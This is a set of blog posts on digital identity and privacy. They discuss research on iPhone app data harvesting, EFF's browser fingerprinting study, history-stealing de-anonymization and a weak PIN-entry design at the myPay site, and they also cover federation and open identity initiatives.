Enterprise lockdown versus consumer applications

My friend Cameron Westland, who has worked on some cool applications for the iPhone, wrote me to complain that I linked to iPhone Privacy:

I understand the implications of what you are trying to say, but how is this any different from Mac OS X applications accessing the address book or Windows applications accessing contacts? (I'm not sure about Windows, but I know it's possible on a Mac).

Also, the article touches on storing patient information on an iPhone. I believe Seriot is guilty of a major oversight in simply correlating the fact that spy phone has access to contacts with it also being able to do so in a secured enterprise.

If the iPhone is deployed in the enterprise, the corporate administrators can control exactly which applications get installed. In the situations where patient information is stored on the phone, they should be using their own security review process to verify that all applications installed meet the HIPPA  certification requirements. Apple makes no claim that applications meet the stringent needs of certain industries – that's why they give control to administrators to encrypt phones, restrict specific application installs, and do remote wipes.

Also, Seriot did no research behavior of a phone connected to a company's active directory, versus just plain old address book… This is cargo cult science at best, and I'm really surprised you linked to it!

I buy Cameron's point that the controls available to enterprises mitigate a number of the attacks presented by Seriot – and agree this is  important.  How do these controls work?  Corporate administrators can set policies specifying the digital signatures of applications that can be installed.  They can use their own processes to decide what applications these will be. 

None of this depends on App Store verification, sandboxing, or Apple's control of platform content.  In fact it is no different from the universally available ability to use a combination of enterprise policy and digital signature to protect enterprise desktop and server systems.  Other features, like the ability for an operator to wipe information, are also pretty much universal.

If the iPhone can be locked down in enterprises, why is Seriot's paper still worth reading?  Because many companies and even governments are interested in developing customer applications that run on phones.  They can't dictate to customers what applications to install, and so lock-down solutions are of little interest.  They turn to Apple's own claims about security, and find statements like this one, taken from the otherwise quite interesting iPhone security overview.

Runtime Protection

Applications on the device are “sandboxed” so they cannot access data stored by other applications. In addition, system files, resources, and the kernel are shielded from the user’s application space. If an application needs to access data from another application, it can only do so using the APIs and services provided by iPhone OS. Code generation is also prevented.

Seriot shows that taking this claim at face value would be risky.  As he says in an eWeek interview:

“In late 2009, I was involved in discussions with the Swiss private banking industry regarding the confidentiality of iPhone personal data,” Seriot told eWEEK. “Bankers wanted to know how safe their information [stores] were, which ones are exactly at risk and which ones are not. In brief, I showed that an application downloaded from the App Store to a standard iPhone could technically harvest a significant quantity of personal data … [including] the full name, the e-mail addresses, the phone number, the keyboard cache entries, the Wi-Fi connection logs and the most recent GPS location.” 

It is worth noting that Seriot's demonstration is very easy to replicate, and doesn't depend on silly assumptions like convincing the user to disable their security settings and ignore all warnings.

The points made about banking applications apply even more to medical applications.  Doctors are effectively customers from the point of view of the information management services they use.  Those services won't be able to dictate the applications their customers deploy.  I know for sure that my doctor, bless his soul,  doesn't have an IT department that sets policies limiting his ability to play games or buy stocks.  If he starts using his phone for patient-related activities, he should be aware of the potential issues, and that's what MedPage was talking about.

Neither MedPage, nor CNET, nor eWeek nor Seriot nor I are trying to trash the iPhone – it's just that application isolation is one of the hardest problems of computer science.  We are pointing out that the iPhone is a computing device like all the others and subject to the same laws of digital physics, despite dangerous mythology to the contrary.  On this point I don't think Cameron Westland and I disagree.

 

SpyPhone for iPhone

The MedPage Today blog recently wrote about “iPhone Security Risks and How to Protect Your Data — A Must-Read for Medical Professionals.”  The story begins: 

Many healthcare providers feel comfortable with the iPhone because of its fluid operating system, and the extra functionality it offers, in the form of games and a variety of other apps.  This added functionality is missing with more enterprise-based smart phones, such as the Blackberry platform.  However, this added functionality comes with a price, and exposes the iPhone to security risks. 

Nicolas Seriot, a researcher from the Swiss University of Applied Sciences, has found some alarming design flaws in the iPhone operating system that allow rogue apps to access sensitive information on your phone.

MedPage quotes a CNET article where Elinor Mills reports:

Lax security screening at Apple's App Store and a design flaw are putting iPhone users at risk of downloading malicious applications that could steal data and spy on them, a Swiss researcher warns.

Apple's iPhone app review process is inadequate to stop malicious apps from getting distributed to millions of users, according to Nicolas Seriot, a software engineer and scientific collaborator at the Swiss University of Applied Sciences (HEIG-VD). Once they are downloaded, iPhone apps have unfettered access to a wide range of privacy-invasive information about the user's device, location, activities, interests, and friends, he said in an interview Tuesday…

In addition, a sandboxing technique limits access to other applications’ data but leaves exposed data in the iPhone file system, including some personal information, he said.

To make his point, Seriot has created open-source proof-of-concept spyware dubbed “SpyPhone” that can access the 20 most recent Safari searches, YouTube history, and e-mail account parameters like username, e-mail address, host, and login, as well as detailed information on the phone itself that can be used to track users, even when they change devices.

Following the link to Seriot's paper, called iPhone Privacy, here is the abstract:

It is a little known fact that, despite Apple's claims, any applications downloaded from the App Store to a standard iPhone can access a significant quantity of personal data.

This paper explains what data are at risk and how to get them programmatically without the user's knowledge. These data include the phone number, email accounts settings (except passwords), keyboard cache entries, Safari searches and the most recent GPS location.

This paper shows how malicious applications could pass the mandatory App Store review unnoticed and harvest data through officially sanctioned Apple APIs. Some attack scenarios and recommendations are also presented.

 

In light of Seriot's paper, MedPage concludes:

These security risks are substantial for everyday users, but become heightened if your phone contains sensitive data, in the form of patient information, and when your phone is used for patient care.   Over at iMedicalApps.com, we are not fans of medical apps that enable you to input patient data, and there are several out there.  But we also have peers who have patient contact information stored on their phones, patient information in their calendars, or are accessible to their patients via e-mail.  You can even e-prescribe using your iPhone. 

I don't want to even think about e-prescribing using an iPhone right now, thank you.

Anyone who knows anything about security has known all along that the iPhone – like all devices – is vulnerable to some set of attacks.  For them, iPhone Privacy will be surprising not because it reveals possible attacks, but because of how amazingly elementary they are (the paper is a must-read from this point of view).  

On a positive note, the paper might awaken some of those sent into a deep sleep by proselytizers convinced that Apple's App Store censorship program is reasonable because it protects them from rogue applications.

Evidently Apple's App Store staff take their mandate to protect us from people like award winning Mad Magazine cartoonist  Tom Richmond pretty seriously (see Apple bans Nancy Pelosi bobble head).  If their approach to “protecting” the underlying platform has any merit at all, perhaps a few of them could be reassigned to work part time on preventing trivial and obvious hacker exploits..

But I don't personally think a closed platform with a censorship board is either the right approach or one that can possibly work as attackers get more serious (in fact computer science has long known that this approach is baloney).  The real answer will lie in hard, unfashionable and (dare I say it?) expensive R&D into application isolation and related technologies. I hope this will be an outcome:  first, for the sake of building a secure infrastructure;  second, because one of my phones is an iPhone and I like to explore downloaded applications too.

[Heads Up: Khaja Ahmed]

Sorry Tomek, but I “win”

As I discussed here, the EFF is running an experimental site demonstrating that browsers ooze an unnecessary “browser fingerprint” allowing users to be identified across sites without their knowledge.  One can easily imagine this scenario:

  1. Site “A” offers some service you are interested in and you release your name and address to it.  At the same time, the site captures your browser fingerprint.
  2. Site “B” establishes a relationship with site “A” whereby when it sends “A” a browser fingerprint and “A” responds with the matching identifying information.
  3. You are therefore unknowingly identified at site “B”.

I can see browser fingerprints being used for a number of purposes.  Some sites might use a fingerprint to keep track of you even after you have cleared your cookies – and rationalize this as providing added security.  Others will inevitably employ it for commercial purposes – targeted identifying customer information is high value.  And the technology can even be used for corporate espionage and cyber investigations.

It is important to point out that like any fingerprint, the identification is only probabilistic.  EFF is studying what these probabilities are.  In my original test, my browser was unique in 120,000 other browsers – a number I found very disturbing.

But friends soon wrote back to report that their browser was even “more unique” than mine!  And going through my feeds today I saw a post at Tomek's DS World where he reported a staggering fingerprint uniqueness of 1 in 433,751:

 

It's not that I really think of myself as super competitive, but these results were so extreme I decided to take the test again.  My new score is off the scale:

Tomek ends his post this way:

“So a browser can be used to identify a user in the Internet or to harvest some information without his consent. Will it really become a problem and will it be addressed in some way in browsers in the future? This question has to be answered by people responsible for browser development.”

I have to disagree.  It is already a problem.  A big problem.  These outcomes weren't at all obvious in the early days of the browser.  But today the writing is on the wall and needs to be addressed.  It's a matter right at the core of delivering on a trustworthy computing infrastructure.    We need to evolve the world's browsers to employ minimal disclosure, releasing only what is necessary, and never providing a fingerprint without the user's consent.

 

More unintended consequences of browser leakage

Joerg Resch at Kuppinger Cole points us to new research showing  how social networks can be used in conjunction with browser leakage to provide accurate identification of users who think they are browsing anonymously.

Joerg writes:

Thorsten Holz, Gilbert Wondracek, Engin Kirda and Christopher Kruegel from Isec Laboratory for IT Security found a simple and very effective way to identify a person behind a website visitor without asking for any kind of authentication. Identify in this case means: full name, adress, phone numbers and so on. What they do, is just exploiting the browser history to find out, which social networks the user is a member of and to which groups he or she has subscribed within that social network.

The Practical Attack to De-Anonymize Social Network Users begins with what is known as “history stealing”.  

Browsers don’t allow web sites to access the user’s “history” of visited sites.  But we all know that browsers render sites we have visited in a different color than sites we have not.  This is available programmatically through javascript by examining the a:visited style.  So malicious sites can play a list of URLs and examine the a:visited style to determine if they have been visited, and can do this without the user being aware of it.

This attack has been known for some time, but what is novel is its use.  The authors claim the groups in all major social networks are represented through URLs, so history stealing can be translated into “group membership stealing”.  This brings us to the core of this new work.  The authors have developed a model for the identification characteristics of group memberships – a model that will outlast this particular attack, as dramatic as it is.

The researchers have created a demonstration site that works with the European social network Xing.  Joerg tried it out and, as you can see from the table at left, it identified him uniquely – although he had done nothing to authenticate himself.  He says,

“Here is a screenshot from the self-test I did with the de-anonymizer described in my last post. I´m a member in 5 groups at Xing, but only active in just 2 of them. This is already enough to successfully de-anonymize me, at least if I use the Google Chrome Browser. Using Microsoft Internet Explorer did not lead to a result, as the default security settings (I use them in both browsers) seem to be stronger. That´s weird!”

Since I’m not a user of Xing I can’t explore this first hand.

Joerg goes on to ask if history-stealing is a crime?  If it’s not, how mainstream is this kind of analysis going to become?  What is the right legal framework for considering these issues?  One thing for sure:  this kind of demonstration, as it becomes widely understood, risks profoundly changing the way people look at the Internet.

To return to the idea of minimal disclosure for the browser, why do sites we visit need to be able to read the a:visited attribute?  This should again be thought of as “fingerprinting”, and before a site is able to retrieve the fingerprint, the user must be made aware that it opens the possibility of being uniquely identified without authentication.

Minimal disclosure for browsers

Not five minutes after pressing enter on my previous post a friend wrote back and challenged me to compare IE's behavior with that of Firefox.  I don't like doing product comparisons but clearly this is a question others will ask so I'll share the results with you:

Results:  behavior of the two browsers are essentially identical.  In both cases, my browser was uniquely identified.

Conclusion:  we need to work across the industry to align browsers with minimal disclosure principles.  How much information needs to be released to a site we don't trust yet?  To what extent can the detailed information currently release be collapsed into non-identifying categories?  When there is some compelling reason to release detailed information, how do we inform the user that the site wants to obtain a fingerprint?

New EFF Research on Web Browser Tracking

Slashdot's CmdrTaco points us to a research project announced by EFF‘s Peter Eckersley that I expect will provoke both discussion and action:

What fingerprints does your browser leave behind as you surf the web?

Traditionally, people assume they can prevent a website from identifying them by disabling cookies on their web browser. Unfortunately, this is not the whole story.

When you visit a website, you are allowing that site to access a lot of information about your computer's configuration. Combined, this information can create a kind of fingerprint – a signature that could be used to identify you and your computer. But how effective would this kind of online tracking be?

EFF is running an experiment to find out. Our new website Panopticlick will anonymously log the configuration and version information from your operating system, your browser, and your plug-ins, and compare it to our database of five million other configurations. Then, it will give you a uniqueness score – letting you see how easily identifiable you might be as you surf the web.

Adding your information to our database will help EFF evaluate the capabilities of Internet tracking and advertising companies, who are already using techniques of this sort to record people's online activities. They develop these methods in secret, and don't always tell the world what they've found. But this experiment will give us more insight into the privacy risk posed by browser fingerprinting, and help web users to protect themselves.

To join the experiment:
http://panopticlick.eff.org/

To learn more about the theory behind it:
http://www.eff.org/deeplinks/2010/01/primer-information-theory-and-priva…

Interesting that my own browser was especially recognizable:

 

I know my video configuration is pretty bizarre – but don't understand why I should be broadcasting that when I casually surf the web.  I would also like to understand what is so special about my user agent info. 

Pixel resolution like 1435 x 810 x 32 seems unnecessarily specific.  Applying the concept of minimal disclosure, it would be better to reveal simply that my machine is in some useful “class” of resolution that would not overidentify me.

I would think the provisioning of highly identifying information should be limited to sites with which I have an identity relationship.  If we can agree on a shared mechanism for storing information about our trust for various sites (information cards offer this capability) our browsers could automatically adjust to the relationship they were in, releasing information as necessary.  This is a good example of how a better identity system is needed to protect privacy while providing increased functionality.

 

All the help we can get

Now that the world is so thoroughly post-modern, how often do you come across information that qualifies as unexpected?  Well, I have to say that the following story , appearing in the The Australian, left me wide-eyed:

Yesterday, in the church of the City of London Corporation, (Canon Parrot)  presented an updated version of Plow Monday, an observance that dates from medieval times. On this day, the first Monday after Twelfth Night, farm labourers would bring a plough to the door of the church to be blessed.

“When I arrived a few months ago I looked at this service and thought, ‘Why do we have a Plow Monday?’,” Canon Parrott said. Men and women coming to his church no longer used ploughs; their tools were their laptops, their iPhones and their BlackBerries.

So he wrote a blessing and strode out to deliver it before a congregation of 80, the white heat of technology shining from his every pronouncement. “I invite you to have your mobile phone out … though I would like you to put it on silent,” he said.

This was Church 2.0. Behind him, the altar resembled a counter at PC World. Upon it, laid out like holy relics, were four smart phones, one Apple laptop and one Dell.

Then, after another hymn, came the blessing of the smart phones. The Lord Mayor of London offered his BlackBerry to Canon Parrott, which was received with due reverence and placed upon the altar.

The congregation held their phones in the air, and Canon Parrott addressed the Almighty. “By Your blessing, may these phones and computers, symbols of all the technology and communication in our daily lives, be a reminder to us that You are a God who communicates with us and who speaks by Your Word. Amen.”

It makes me wonder what Innis said to McLuhan when he read abut this.

Le Figaro carried a report of an additional prayer, “”May our tongues be gentle, our e-mails be simple and our websites be accessible”. 

Perhaps it is asking too much, but I would have really liked Father Parrott to add, “websites be accessible and secure.”  After all – it can't hurt.   Perhaps next time?

Federation with ADFS in Windows Server 2008

Steve Riley at Amazon takes a fascinating and non-ideological approach on his new blog.  The combination will keep me tuned in – I expect others will feel the same way.  He writes:

“As I've talked with customers who have deployed or plan to deploy Windows Server 2008 instances on Amazon EC2, one feature they commonly inquire about is Active Directory Federation Services (ADFS). There seems to be a lot of interest in ADFS v2 with its support for WS-Federation and Windows Identity Foundation. These capabilities are fully supported in our Windows Server 2008 AMIs and will work with applications developed for both the “public” side of AWS and those you might run on instances inside Amazon VPC.

“I'd like to get a better sense of how you might use ADFS. When you state that you need “federation,” what are you wanting to do? I imagine most scenarios involve applications on Amazon EC2 instances obtaining tokens from an ADFS server located inside your corporate network. This makes sense when your users are in your own domains and the applications running on Amazon EC2 are yours.

“Another scenario involves a forest living entirely inside Amazon EC2. Imagine you've created the next killer SaaS app. As customers sign up, you'd like to let them use their own corpnet credentials rather than bother with creating dedicated logons (your customers will love you for this). You'd create an application domain in which you'd deploy your application, configured to trust tokens only from the application's ADFS. Your customers would configure their ADFS servers to issue tokens not for your application but for your application domain ADFS, which in turn issues tokens to your application. Signing up new customers is now much easier.

“What else do you have in mind for federation? How will you use it? Feel free to join the discussion. I've started a thread on the forums, please add your thoughts there. I'm looking forward to some great ideas.”

I really look forward to this.  Let's see where it goes…  

Given the mail I get from mutual customers, I know Steve will end up with some interesting insights.

Bizzare customer journey at myPay…

Internet security is a sitting duck that could easily succumb to a number of bleak possible futures.

One prediction we can make with certainty is that as the overall safety of the net continues to erode, individual web sites will flail around looking for ways to protect themselves. They will come across novel ideas that seem to make sense from the vantage point of a single web site. Yet if they implement these ideas, most of them will backfire. Internet users have to navigate many different sites on an irregular basis. For them, the experience of disparate mechanisms and paradigms on every different site will be even more confusing and troubling than the current degenerating landscape. The Seventh Law of Identity is animated by these very concerns.

I know from earlier exchanges that Michael Ramirez understands these issues – as well as their architectural implications. So I can just imagine how he felt when he first encountered a new system that seems to represent an unfortunately great example of this dynamic. His first post on the matter started this way:

“Logging into the DFAS myPay site is frustrating. This is the gateway where DoD employees can view and change their financial data and records.

“In an attempt secure the interface (namely to prevent key loggers), they have implemented a javascript-based keyboard where the user must enter their PIN using their mouse (or using the keyboard pressing tab LOTS of times).

“A randomization function is used to change the position of the buttons, presumably to prevent a simple click-tracking virus from simply replaying the click sequence. Numbers always appear on the upper row and the letters will appear in a random position on the same row where they exist on the keyboard (e.g. QWERTY letters will always appear on the top row, just in a random order).

“At first glance, I assumed that there would be some server-side state that identified the position of the buttons (as to not allow the user's browser to arbitrarily choose the positions). Looking at how the button layout is generated, however, makes it clear that the position is indeed generated by the client-side alone. Javascript functions are called to randomize the locations, and the locations of these buttons are included as part of the POST parameters upon authentication.

“A visOrder variable is included with a simple substitution cipher to identify button locations: 0 is represented by position 0, 1 by position 1, etc. Thus:

VisOrder =3601827594
Substitution =0123456789
Example PIN =325476
Encoded =102867

“Thus any virus/program can easily mount an online guessing attack (since it defines the substitution pattern), and can quickly decipher the PIN if it has access to the POST parameters.

“The web site's security implementation is painfully trivial, so we can conclude that the Javascript keyboard is only to prevent keyloggers. But it has a number of side effects, especially with respect to the security of the password. Given the tedious nature of PIN entry, users choose extremely simplistic passwords. MyPay actually encourages this as it does not enforce complexity requirements and limits the length of the password between 4 and 8 characters. There is no support for upper/lower case or special characters. 36 possible values over an 4-character search space is not terribly secure.”

A few days later, Michael was back with an even stranger report. In fact this particular “user journey” verges on the bizarre. Michael writes:

“MyPay recently overhauled their interface and made it more “secure.” I have my doubts, but they certainly have changed how they interact with the user.

“I was a bit speechless. Pleading with users is new, but maybe it'll work for them. Apparently it'll be the only thing working for them:

Although most users have established their new login credentials with no trouble, some users are calling the Central Customer Support Unit for assistance. As a result, customer support is experiencing high call volume, and many customers are waiting on hold longer than usual.

We apologize for any inconvenience this may cause. We are doing everything possible to remedy this situation.

Michael concludes by making it clear he thinks “more than a few” users may have had trouble. He says, “Maybe, just maybe, it's because of your continued use of the ridiculous virtual keyboard. Yes, you've increased the password complexity requirements (which actually increased security), but slaughtered what little usability you had. I promise you that getting rid of it will ‘remedy this situation.'”

One might just shrug one's shoulders and wait for this to pass. But I can't do that.  I feel compelled to redouble our efforts to produce and adopt a common standards-based approach to authentication that will work securely and in a consistent way across different web sites and environments.  In other words, reusable identities, the claims-based architecture, and truly usable and intuitive visual interfaces.

OpenID and Information Cards at the NIH

Drummond Reed writes about real progress by the National Institute of Health in making their sites accessible through what the U.S. government has started to call Open Identities.   The decision by the NIH and the U.S. administration to leverage existing identity infrastructures is tremendously interesting – it turns the usual paradigm for government identity on its head.  Drummond, who is Executive Director of the Information Card Foundation, writes:

Bethesda, MD, USA – The first iTrust Forum, held today at the National Institute of Health (NIH) headquarters in Bethesda, MD, featured a four-part session about the U.S. government’s Open Identity for Open Government Initiative. NIH is leading government adoption of this initiative through the NIH Federated Identity Service. NIH demonstrated the first production use of open identity technologies at the iTrust Forum by showing how the Federated Identity Service now accepts logins from several of the ten OpenID and Information Card identity providers who have announced participation in the initiative.

In a separate demonstration, Don Schmidt of Microsoft showed a prototype “multi-protocol selector” – software that will enable users to do both OpenID and Information Card registration/login to websites through one simple, safe, visual interface. This will make authentication at many different websites dramatically simpler for users while at the same time providing strong protection against the main source of phishing attacks.

ICF Executive Director Drummond Reed and OpenID Foundation Executive Director Don Thibeau presented the Open Identity Framework (OIF), a new open trust framework model being developed jointly by the ICF and OIDF to solve the problem of how third-party portable identity credentials such as OpenID and Information Cards can be trusted in very large deployments, such as across the entire U.S. population and all U.S. government websites.

As described in the two foundation’s first joint white paper, the OIF is being developed to meet the requirements of the U.S. ICAM Trust Framework Provider Adoption Process (TFPAP). It applies the principles of open source software and open community development to the definition and deployment of trust frameworks for multiple trust communities around the world. It will allow identity providers to be certified for compliance with the levels of assurance (LOA) required by relying party websites, while also allowing relying parties to be certified for compliance with the levels of protection (LOP) that may be required by identity providers and the users they represent.

The OIF also applies market forces to certification and accountability by enabling identity providers and relying parties to make their own choice of assessor and auditor, provided they meet the qualifications specified by the trust framework for which they will provide assessment or auditing services.

The end goal of the Open Identity for Open Government Initiativeat NIH and its Center for Information Technology (CIT) is to give users of NIH websites and other electronic resources the ability to have a single account and login procedure that will allow access to all NIH applications, as well as other government and private sector applications. This will make it easier for users to access information resources, remove the responsibility for authentication from website and application owners, and improve security.

The Open Identity initiative is already expanding to other U.S. government agencies beyond NIH, including the Food and Drug Administration (FDA) and the General Services Administration (GSA). The Library of Congress has also expressed an interest in joining.

The ICF congratulates the achievements of the NIH Federated Identity team, led by Debbie Bucci, Valerie Wampler, Jane Small, Jim Seach, Tom Mason, and Peter Alterman, who were recognized with both the 2008 NIH Director’s Award and the Government Information Technology Executive Council (GITEC) 2009 Project Management Excellent Award.